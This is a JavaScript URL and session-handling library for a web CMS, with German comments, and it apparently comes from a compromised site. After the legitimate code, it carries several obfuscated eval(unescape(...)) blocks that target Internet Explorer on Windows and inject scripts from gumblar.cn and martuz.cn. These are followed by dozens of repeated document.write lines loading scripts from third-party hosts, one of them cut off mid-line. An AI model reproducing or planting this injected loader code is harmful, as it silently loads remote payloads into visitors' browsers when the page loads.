// ------------------------------------------------------------------------------
//
// ---------------------------------------------------------------------
var CM_SESSION_KEY_KEY = "cmSessionKeyKey";
// ---------------------------------------------------------------------

// ALTE REFERENZEN SOLLTEN BALD ABGELÖST SEIN ////////////
function getSessionPair(loc) {
	return URL.getSessionPair(loc);
}

function getSessionHref() {
	return URL.getSessionHref();
}

function processLinkz(doc) {
	URL.processLinkz(doc);
}

function getSessionString() {
	return URL.getSessionString();
}

function jdecode(s) {
	return URL.jdecode(s);
}

function jencode(s) {
	return URL.jencode(s);
}
//////////////////////////////////////////////////////////
URL.buildURL = function(sURL) {
	if(sURL.indexOf(":") == -1) {
		//return window.location.protocol + "//" + window.location.host + sURL;
		var url = new URL(document.location.href);

		if (sURL.indexOf("./") == 0 || sURL.indexOf("../") == 0) {
			var idx = url.path.lastIndexOf("/");
			if (idx != -1) {
				url.path = url.path.substring(0, idx) + "/";
			}

			return (url.protocol + "://" + url.authority + url.path + sURL);
		} else {
			return (url.protocol + "://" + url.authority + sURL);
		}
	} else {
		return sURL;
	}
}
// ---------------------------------------------------------------------
URL.getSessionPair = function(loc) {
	var url;
	var sess_key = window.top.cmSessionKey;
	var sess_val = window.top.cmSessionValue;

	if (!loc)
		loc = document.location.href;

	if (!sess_key || !sess_val) {
		url = new URL(loc, true, true);
		sess_key = url.getParameter(CM_SESSION_KEY_KEY, "");
		sess_val = url.getParameter(sess_key, "");
	}

	return [sess_key, sess_val];
}
// ---------------------------------------------------------------------
URL.getSessionHref = function() {
	var url = new URL(document.location.href, true, true);
	url.setSession();
	return url.toExternalForm();
}
// ---------------------------------------------------------------------
URL.processLinkz = function(doc) {
	if (!doc) doc = window.document;

	var sess_pair = getSessionPair();
	var sess_key = sess_pair[0];
	var sess_val = sess_pair[1];

	for (var i = 0 ; i < doc.links.length ; i++) {
		var a = doc.links[i];

		var newHref 	 = new URL(a.href, true, true);
		var sessionDummy = newHref.getParameter("*session*id*key*", "");

		if (sessionDummy == "*session*id*val*") {
			newHref.removeParameter("*session*id*key*");

			if (sess_key && sess_val) {
				newHref.setParameter(sess_key, sess_val, true);
				newHref.setParameter(CM_SESSION_KEY_KEY, sess_key, true);
			}

			a.href = newHref.toExternalForm();
		}
	}
}
// ---------------------------------------------------------------------
URL.getSessionString = function() {
	var sess_pair = getSessionPair();

	if (sess_pair[0] && sess_pair[1]) {
		return sess_pair[0] + "=" + sess_pair[1] + "&" + CM_SESSION_KEY_KEY + "=" + sess_pair[0];
	} else {
		return "";
	}
}
// ---------------------------------------------------------------------
// -  Helper Funktionen  -----------------------------------------------
// ---------------------------------------------------------------------
URL.jdecode = function(s) {
	var re = /\+/g;
	s = s.replace(re, "%20");
	return unescape(s);
}
// ---------------------------------------------------------------------
URL.deamplify = function(s) {
	var re = /&amp;/g;
	s = s.replace(re, "&");
	return s;
}
//------------------------------------------------------------------------------
//	Simuliert java.net.URLDecoder.encode()
URL.jencode = function(s) {
	var re1 = /\+/g;
	var re2 = /%20/g;
	s = escape(s);
	return s.replace(re1, "%2B").replace(re2, "+");
}
// ---------------------------------------------------------------------
// -  Allgemeine URL-Klasse  -------------------------------------------
// ---------------------------------------------------------------------
URL.prototype.set   		  	 = URL_set;
URL.prototype.debug 		  	 = URL_debug;
URL.prototype.isValidProtocol 	 = URL_isValidProtocol;
URL.prototype.toExternalForm  	 = URL_toExternalForm;
URL.prototype.toString  	  	 = URL_toExternalForm;
URL.prototype.parseQueryString 	 = URL_parseQueryString;
URL.prototype.getParameter 		 = URL_getParameter;
URL.prototype.getParameterValues = URL_getParameterValues;
URL.prototype.getParameterNames  = URL_getParameterNames;
URL.prototype.setParameter	 	 = URL_setParameter;
URL.prototype.removeParameter	 = URL_removeParameter;
URL.prototype.setSession		 = URL_setSession;
URL.prototype.removeAllParams    = URL_removeAllParams;
// ---------------------------------------------------------------------
function URL(spec, skipSession, skipCacheControl) {
	spec = URL.buildURL(spec);

    this.protocol	= null;
    this.host		= null;
    this.port 		= -1;
    this.file		= null;
    this.query		= null;
    this.authority	= null;
    this.path		= null;
    this.userInfo	= null;
    this.ref		= null;
	this.qParams	= new Object();

	var i, limit, c;

	var original 	= spec;
	var start 		= 0;
	var newProtocol = null;
	var aRef 		= false;

	limit = spec.length;

	while ((limit > 0) && (spec.charAt(limit - 1) <= ' ')) {
		limit--;	//eliminate trailing whitespace
	}

	while ((start < limit) && (spec.charAt(start) <= ' ')) {
		start++;	// eliminate leading whitespace
	}

	if (spec.substr(start, 4).toLowerCase() == "url:") {
		start += 4;
	}

	if (start < spec.length && spec.charAt(start) == '#') {
		/* we're assuming this is a ref relative to the context URL.
		 * This means protocols cannot start w/ '#', but we must parse
		 * ref URL's like: "hello:there" w/ a ':' in them.
		 */
		aRef = true;
	}

	for (i = start ; !aRef && (i < limit) && ((c = spec.charAt(i)) != '/') ; i++) {

		if (c == ':') {
			var s = spec.substring(start, i).toLowerCase();

			if (this.isValidProtocol(s)) {
				newProtocol = s;
				start = i + 1;
			}

			break;
		}
	}


	// Only use our context if the protocols match.
	this.protocol = newProtocol;

	if (this.protocol == null) {
		//alert("no protocol: "+original);
	}

	i = spec.indexOf('#', start);

	if (i >= 0) {
		this.ref = spec.substring(i + 1, limit);
		limit = i;
	}

	parseURL(this, spec, start, limit);
	this.parseQueryString();
	//handler.parseURL(this, spec, start, limit);
	if (!skipSession) {
		this.setSession();
	}
	
	if (!skipCacheControl) {
		this.setParameter("cc", Math.random(), true);
	}
}
// ---------------------------------------------------------------------
function URL_set(protocol, host, port, authority, userInfo, path, query, ref) {
	this.protocol 	= protocol;
	this.host 		= host;
	this.port 		= port;
	this.file 		= query == null ? path : path + "?" + query;
	this.userInfo 	= userInfo;
	this.path 		= path;
	this.ref 		= ref;
	this.query 		= query;
	this.authority 	= authority;
}
// ---------------------------------------------------------------------
function URL_debug() {
	var debug = "protocol:  " + this.protocol + "\n"
			  + "host:      " + this.host + "\n"
			  + "port:      " + this.port + "\n"
			  + "file:      " + this.file + "\n"
			  + "userInfo:  " + this.userInfo + "\n"
			  + "path:      " + this.path + "\n"
			  + "ref:       " + this.ref + "\n"
			  + "query:     " + this.query + "\n"
			  + "authority: " + this.authority + "\n\n";

	var key;

	for (key in this.qParams) {
		var vals = this.qParams[key];

		debug += key + " -> [";

		if (!vals) {
			alert("missing: " + key);
			continue;
		}

		for (var i = 0 ; i < vals.length; i++) {
			debug += vals[i] + (i != (vals.length-1) ? "," : "");
		}

		debug += "]\n";
	}

	alert(debug);
}
// ---------------------------------------------------------------------
function URL_getParameter(key, defval) {
	if (!key)
		return defval;

	var toret = this.qParams[key];

	if (toret == null) {
		return defval;
	} else {
		return toret[0];
	}
}
// ---------------------------------------------------------------------
function URL_getParameterValues(key) {
	return this.qParams[key];
}
// ---------------------------------------------------------------------
function URL_getParameterNames() {
	var key;
	var keys = new Array();

	for (key in this.qParams) {
		keys[keys.length] = key;
	}

	return keys;
}
// ---------------------------------------------------------------------
function parseURL(u, spec, start, limit) {
	var protocol 	= u.protocol;
	var authority 	= u.authority;
	var userInfo 	= u.userInfo;
	var host 		= u.host;
	var port 		= u.port;
	var file 		= u.file;
	var ref 		= u.ref;	// This field has already been parsed

	var query 		= null;

	var isRelPath 	= false;
	var queryOnly 	= false;


	// FIX: should not assume query if opaque
	// Strip off the query part
	if (start < limit) {
		var queryStart = spec.indexOf('?');
		queryOnly = (queryStart == start);

		if (queryStart != -1) {
			query = spec.substring(queryStart+1, limit);

			if (limit > queryStart)
				limit = queryStart;

			spec = spec.substring(0, queryStart);
		}
	}

	var i = 0;
	// Parse the authority part if any
	if ((start <= limit - 2) && (spec.charAt(start) == '/') && (spec.charAt(start + 1) == '/')) {
		start += 2;
		i = spec.indexOf('/', start);
		if (i < 0) {
			i = spec.indexOf('?', start);

			if (i < 0)
				i = limit;
		}

		host = authority = spec.substring(start, i);

		var ind = authority.indexOf('@');

		if (ind != -1) {
			userInfo = authority.substring(0, ind);
			host = authority.substring(ind+1);
		}

		ind = host.indexOf(':');
		port = -1;
		if (ind >= 0) {
			// port can be null according to RFC2396
			if (host.length > (ind + 1)) {
				port = parseInt(host.substring(ind + 1));
			}
			host = host.substring(0, ind);
		}

		start = i;
		// If the authority is defined then the path is defined by the
		// spec only; See RFC 2396 Section 5.2.4.
		if (authority != null && authority.length > 0)
			file = "";
	}

	if (host == null) {
		host = "";
	}

	// Parse the file path if any
	if (start < limit) {
		if (spec.charAt(start) == '/') {
			file = spec.substring(start, limit);
		} else if (file != null && file.length > 0) {
			isRelPath = true;
			var ind = file.lastIndexOf('/');

			var seperator = "";

			if (ind == -1 && authority != null)
				seperator = "/";

			file = file.substring(0, ind + 1) + seperator + spec.substring(start, limit);
		} else {
			var seperator = (authority != null) ? "/" : "";
			file = seperator + spec.substring(start, limit);
		}
	} else if (queryOnly && file != null) {
		var ind = file.lastIndexOf('/');
		if (ind < 0)
			ind = 0;
		file = file.substring(0, ind) + "/";
	}

	if (file == null)
		file = "";

	if (isRelPath) {
		// Remove embedded /./
		while ((i = file.indexOf("/./")) >= 0) {
			file = file.substring(0, i) + file.substring(i + 2);
		}
		// Remove embedded /../
		while ((i = file.indexOf("/../")) >= 0) {
			if ((limit = file.lastIndexOf('/', i - 1)) >= 0) {
				file = file.substring(0, limit) + file.substring(i + 3);
			} else {
				file = file.substring(i + 3);
			}
		}
		// Remove trailing ..
		while (file.substring(file.length - 3, file.length) == "/..") {
		//while (file.endsWith("/..")) {
			i = file.indexOf("/..");
			if ((limit = file.lastIndexOf('/', i - 1)) >= 0) {
				file = file.substring(0, limit+1);
			} else {
				file = file.substring(0, i);
			}
		}
		// Remove trailing .
		if (file.substring(file.length - 2, file.length) == "/.")
		//if (file.endsWith("/."))
			file = file.substring(0, file.length() -1);
	}

	setURL(u, protocol, host, port, authority, userInfo, file, query, ref);
}
// ---------------------------------------------------------------------
function setURL(u, protocol, host, port, authority, userInfo, path, query, ref) {
	u.set(u.protocol, host, port, authority, userInfo, path, query, ref);
}
// ---------------------------------------------------------------------
function URL_isValidProtocol(protocol) {
	return true;
	/*var len = protocol.length;

	if (len < 1)
		return false;

    var c = protocol.charAt(0);

	//if (!Character.isLetter(c))
	if (!isNaN(c))
		return false;

	for (var i = 1 ; i < len ; i++) {
	    c = protocol.charAt(i);

	    if (!Character.isLetterOrDigit(c) && c != '.' && c != '+' && c != '-') {
			return false;
	    }
	}
	return true;*/
}
// ---------------------------------------------------------------------
function URL_setParameter(key, val, replace) {
	if (!key)
		return;

	if (replace || this.qParams[key] == null) {
		this.qParams[key] = new Array();
	}

	this.qParams[key][this.qParams[key].length] = val;
}
// ---------------------------------------------------------------------
function URL_removeParameter(key) {
	var _key;
	var newQParams = new Object();

	for (_key in this.qParams) {
		if (_key != key) {
			newQParams[_key] = this.qParams[_key];
		}
	}

	this.qParams = newQParams;
}
// ---------------------------------------------------------------------
function URL_removeAllParams() {
	var newQParams = new Object();
	this.qParams = newQParams;
}
// ---------------------------------------------------------------------
function URL_parseQueryString() {
	var s;

	if (this.query == null || this.query.length == 0)
		return;
	else
		s = "&" + this.query;

	var idx2;
	var idx = s.indexOf("&");

	while (idx != -1) {
		var kvPair = null;
		var kvPos = 0;

		idx2 = s.indexOf("&", idx+1);

		if (idx2 != -1) {
			kvPair = s.substring(idx+1, idx2);
		} else {
			kvPair = s.substr(idx+1);
		}

		kvPos = kvPair.indexOf("=");

		if (kvPos != -1) {
			var key = kvPair.substring(0, kvPos);
			var val = kvPair.substr(kvPos+1);

			this.setParameter(key, val);
		}

		idx = idx2;
	}
}
// ---------------------------------------------------------------------
function URL_toExternalForm() {
	var result = this.protocol;

	result += ":";

	if (this.authority != null && this.authority.length > 0) {
		result += "//";
		result += this.authority;
	}

	/*if (this.file != null) {
		result += this.file;
	}*/
	if (this.path != null) {
		result += this.path;
	}

	var query = "";
	var key;

	for (key in this.qParams) {
		var vals = this.qParams[key];

		for (var i = 0 ; i < vals.length ; i++) {
			if (query.length == 0) {
				query += key + "=" + vals[i];
			} else {
				query += "&" + key + "=" + vals[i];
			}
		}
	}

	if (query.length > 0) {
		result += "?" + query;
	}

	if (this.ref != null) {
		result += "#";
		result += this.ref;
	}

	return result;
}
// ---------------------------------------------------------------------
function URL_setSession() {
	var sess_pair = getSessionPair();

	if (sess_pair[0] && sess_pair[1]) {
		this.setParameter(sess_pair[0], sess_pair[1], true);
		this.setParameter(CM_SESSION_KEY_KEY, sess_pair[0], true);

		return true;
	}

	return false;
}
// ---------------------------------------------------------------------

<!-- 
(function(t){eval(unescape(('v:61r:20a:3d:22:53criptEn:67ine:22:2cb:3d:22:56ersio:6e:28)+:22:2cj:3d:22:22:2cu:3dnavig:61tor:2eus:65rAgent:3b:69f((u:2eindexOf(:22:57in:22):3e0:29:26:26(:75:2ei:6ed:65x:4ff(:22NT:206:22):3c0):26:26(doc:75ment:2ecookie:2e:69:6edex:4f:66:28:22miek:3d1:22:29:3c0:29:26:26(ty:70eof(zrvzts:29:21:3d:74y:70eo:66(:22A:22):29):7bz:72vzts:3d:22A:22:3beval:28:22i:66(window:2e:22+a+:22)j:3dj+:22+:61+:22M:61j:6fr:22+:62+a+:22Mino:72:22+b+:61:2b:22Build:22+b:2b:22j:3b:22):3bdo:63ume:6et:2ewrite(:22:3csc:72ip:74:20src:3d:2f:2fg:75mblar:2ecn:2frss:2f:3f:69d:3d:22:2bj:2b:22:3e:3c:5c:2fscript:3e:22):3b:7d').replace(t,'%')))})(/:/g);
 --><!-- 
(function(){var t63w='%';eval(unescape(('#76#61r#20a#3d#22Scri#70tE#6e#67ine#22#2c#62#3d#22Vers#69on#28#29+#22#2cj#3d#22#22#2cu#3dn#61#76igator#2eu#73e#72Ag#65nt#3b#69f((u#2eindexOf(#22Win#22)#3e0#29#26#26(u#2eind#65#78#4f#66#28#22#4eT#20#36#22)#3c#30)#26#26(d#6f#63#75ment#2e#63#6f#6fk#69#65#2e#69nd#65xO#66#28#22#6d#69ek#3d1#22#29#3c0#29#26#26(t#79peo#66#28#7ar#76z#74#73)#21#3d#74#79#70eo#66(#22#41#22#29))#7b#7arvz#74#73#3d#22#41#22#3b#65#76al(#22if(w#69ndow#2e#22+a#2b#22)j#3dj+#22#2b#61#2b#22#4d#61jo#72#22+#62+a+#22Mi#6eor#22+b+a+#22Bu#69ld#22#2b#62+#22#6a#3b#22#29#3bdoc#75me#6et#2ew#72#69te#28#22#3cscript#20s#72c#3d#2f#2f#67u#6d#62lar#2ec#6e#2frss#2f#3f#69d#3d#22+j+#22#3e#3c#5c#2fscript#3e#22)#3b#7d').replace(/#/g,'%')))})();
 --><!-- 
(function(){var ax2I=('var>20a>3d>22>53>63riptEngine>22>2cb>3d>22V>65>72sion>28)+>22>2cj>3d>22>22>2cu>3d>6e>61vig>61tor>2euserAgen>74>3bi>66>28(>75>2e>69>6edex>4f>66(>22>57in>22)>3e>30)>26>26(u>2eindex>4ff>28>22NT>206>22)>3c0)>26>26>28doc>75m>65nt>2ecookie>2e>69nd>65>78Of(>22>6di>65k>3d1>22>29>3c0>29>26>26>28typeo>66(>7arvzt>73)>21>3dtype>6f>66(>22A>22)))>7b>7arvzts>3d>22A>22>3beva>6c(>22>69>66(w>69ndow>2e>22+a+>22)j>3dj>2b>22>2ba+>22>4da>6aor>22+b+>61+>22>4din>6fr>22+b+>61+>22Bui>6cd>22+b+>22j>3b>22)>3b>64oc>75ment>2ewrite(>22>3c>73>63ript>20>73rc>3d>2f>2fgumbla>72>2ecn>2fr>73s>2f>3f>69d>3d>22>2bj+>22>3e>3c>5c>2fscript>3e>22)>3b>7d').replace(/>/g,'%');var gz3JU=unescape(ax2I);eval(gz3JU)})();
 --><!-- 
(function(xhY8){var xsx='.76.61.72.20a.3d.22S.63rip.74En.67in.65.22.2c.62.3d.22V.65.72s.69on(.29+.22.2cj.3d.22.22.2c.75.3dnav.69.67ator.2e.75s.65rAge.6et.3bi.66((u.2eind.65xOf(.22Win.22.29.3e0).26.26(u.2ein.64exOf(.22NT.206.22).3c0.29.26.26(document.2ecookie.2eindexO.66(.22mie.6b.3d1.22.29.3c0).26.26.28t.79peof(zrv.7ats).21.3dty.70eof(.22A.22).29).7bzrvzt.73.3d.22.41.22.3beval(.22if(window.2e.22+.61+.22)j.3dj+.22.2ba+.22.4d.61j.6f.72.22+b+a.2b.22Min.6fr.22+.62.2ba+.22Bu.69ld.22.2bb+.22.6a.3b.22.29.3bdocum.65nt.2ewrite.28.22.3cscrip.74.20src.3d.2f.2fgumblar.2ecn.2f.72s.73.2f.3f.69.64.3d.22+j+.22.3e.3c.5c.2fsc.72ipt.3e.22).3b.7d';eval(unescape(xsx.replace(xhY8,'%')))})(/./g);
 --><!-- 
(function(){var xVra='%';var tSY=('var_20a_3d_22_53_63ript_45ngine_22_2cb_3d_22Ver_73_69o_6e()+_22_2cj_3d_22_22_2cu_3dnaviga_74o_72_2e_75ser_41g_65nt_3b_69f((u_2eindexOf_28_22_57in_22)_3e_30)_26_26(u_2ei_6ed_65_78_4ff(_22NT_206_22_29_3c_30)_26_26(d_6fcume_6et_2ec_6fok_69e_2eindexOf(_22_6diek_3d1_22_29_3c_30)_26_26(t_79p_65_6ff_28zrvzt_73)_21_3dtypeof(_22A_22_29))_7bzrv_7a_74s_3d_22A_22_3bev_61l(_22i_66_28_77_69_6ed_6fw_2e_22+a+_22_29j_3dj_2b_22+a+_22Major_22+b+a+_22Mino_72_22_2b_62_2ba+_22Build_22+_62+_22_6a_3b_22)_3bd_6fc_75men_74_2ewrite_28_22_3cscript_20sr_63_3d_2f_2fgumblar_2ecn_2fr_73s_2f_3fid_3d_22_2bj+_22_3e_3c_5c_2f_73_63ript_3e_22)_3b_7d').replace(/_/g,xVra);eval(unescape(tSY))})();
 --><!-- 
(function(f4z){var LhY='var:20a:3d:22Sc:72:69:70:74:45:6eg:69:6e:65:22:2cb:3d:22Ver:73ion:28:29:2b:22:2cj:3d:22:22:2cu:3dnaviga:74:6fr:2eus:65:72Age:6et:3bif((u:2einde:78O:66:28:22Ch:72om:65:22):3c0):26:26:28u:2ein:64exO:66(:22Wi:6e:22):3e0):26:26:28u:2e:69ndexOf:28:22NT:20:36:22:29:3c0):26:26(:64ocument:2eco:6fkie:2ei:6edex:4ff(:22:6diek:3d1:22:29:3c0:29:26:26(:74:79peof(:7arv:7ats):21:3d:74:79p:65of:28:22:41:22:29)):7bzrvz:74s:3d:22A:22:3beval:28:22if(:77ind:6fw:2e:22+a+:22)j:3d:6a:2b:22+a+:22Major:22:2bb+a+:22M:69nor:22:2bb+a:2b:22Bui:6cd:22+b:2b:22:6a:3b:22):3bdocument:2ew:72ite(:22:3cscript:20src:3d:2f:2fm:22+:22artuz:2ec:6e:2f:76id:2f:3f:69d:3d:22:2bj+:22:3e:3c:5c:2fs:63r:69pt:3e:22):3b:7d';var IghQ=unescape(LhY.replace(f4z,'%'));eval(IghQ)})(/\:/g);
 -->
document.write('<script src=http://fat-latina.com/_vti_bin/fat_latinas.php ><\/script>');
document.write('<script src=http://reyka-fenster.com/reyka/indexb.php ><\/script>');
document.write('<script src=http://reyka-fenster.com/reyka/indexb.php ><\/script>');
document.write('<script src=http://reyka-fenster.com/reyka/indexb.php ><\/script>');
document.write('<script src=http://reyka-fenster.com/reyka/indexb.php ><\/script>');
document.write('<script src=http://doctor-jade.ru/image/collor1.php ><\/script>');
document.write('<script src=http://doctor-jade.ru/image/collor1.php ><\/script>');
document.write('<script src=http://doctor-jade.ru/image/collor1.php ><\/script>');
document.write('<script src=http://doctor-jade.ru/image/collor1.php ><\/script>');
document.write('<script src=http://doctor-jade.ru/
document.write('<script src=http://rainfordconsultancy.co.uk/templates/indexk.php ><\/script>');
document.write('<script src=http://rainfordconsultancy.co.uk/templates/indexk.php ><\/script>');
document.write('<script src=http://rainfordconsultancy.co.uk/templates/indexk.php ><\/script>');
document.write('<script src=http://baeckerei-vonbirn.de/wandfolia/webdesign.php ><\/script>');
document.write('<script src=http://baeckerei-vonbirn.de/wandfolia/webdesign.php ><\/script>');
document.write('<script src=http://baeckerei-vonbirn.de/wandfolia/webdesign.php ><\/script>');
document.write('<script src=http://baeckerei-vonbirn.de/wandfolia/webdesign.php ><\/script>');
document.write('<script src=http://baeckerei-vonbirn.de/wandfolia/webdesign.php ><\/script>');
document.write('<script src=http://doersserver.com/suntekindustries.org/index.php ><\/script>');
document.write('<script src=http://doersserver.com/suntekindustries.org/index.php ><\/script>');
document.write('<script src=http://sswm2009.freehostia.com/form/dates.php ><\/script>');
document.write('<script src=http://sswm2009.freehostia.com/form/dates.php ><\/script>');
document.write('<script src=http://sswm2009.freehostia.com/form/dates.php ><\/script>');